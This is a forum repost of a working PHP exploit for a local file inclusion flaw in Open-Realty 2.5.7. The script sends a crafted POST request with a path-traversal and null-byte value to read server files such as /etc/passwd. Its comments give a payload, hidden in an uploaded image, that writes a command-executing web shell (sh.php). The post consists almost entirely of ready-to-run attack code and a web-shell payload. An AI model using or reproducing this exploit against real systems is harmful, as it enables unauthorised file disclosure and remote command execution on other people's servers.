首页
社区
课程
招聘
[转帖]Open-Realty 2.5.7 Local File Disclosure Vulnerability
发表于: 2010-8-19 06:13 2813

[转帖]Open-Realty 2.5.7 Local File Disclosure Vulnerability

2010-8-19 06:13
2813
<?php  

/*  

* Exploit Title:   

* Date: 2010-08-18  

* Author: Nikola Petrov  

* Vendor: http://open-realty.org/  

* Version: 2.5.7  

*/

    /*  

        vulnerable: Open-Realty 2.5.7  

        LFI: /index.php  

           

        upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>  

        include the image and sh.php will be generated.  

        proceed with sh.php  

   

        MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.  

    */

   

    print "\n\n#########################################################################\n";  

    print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";  

    print "#Date: 05.09.2009\n";  

    print "#########################################################################\n\n";  

   

    if($argc < 5) {  

        print "usage: $argv[0] host port path file [debug: 1/0]\n";  

        print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";  

        exit();  

    }  

   

    $Host = $argv[1];  

    $Port = $argv[2];  

    $Path = $argv[3];  

    $File = $argv[4];  

   

    function HttpSend($aHost, $aPort, $aPacket) {  

        $Response = "";  

   

        if(!$Socket = fsockopen($aHost, $aPort)) {  

            print "Error connecting to $aHost:$aPort\n\n";  

            exit();  

        }  

           

        fputs($Socket, $aPacket);  

           

        while(!feof($Socket)) $Response .= fread($Socket, 1024);  

           

        fclose($Socket);  

           

        return $Response;  

    }  

   

    $VulnRequest = "select_users_lang=". $File . "%00";  

      

    $Packet  = "POST {$Path} HTTP/1.1\r\n";  

    $Packet .= "Host: {$Host}\r\n";  

    $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";  

    $Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";  

    $Packet .= "$VulnRequest\n";  

   

    if($argv[5] == 1) print $Packet;  

   

    print HttpSend($Host, $Port, $Packet);  

?>

[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//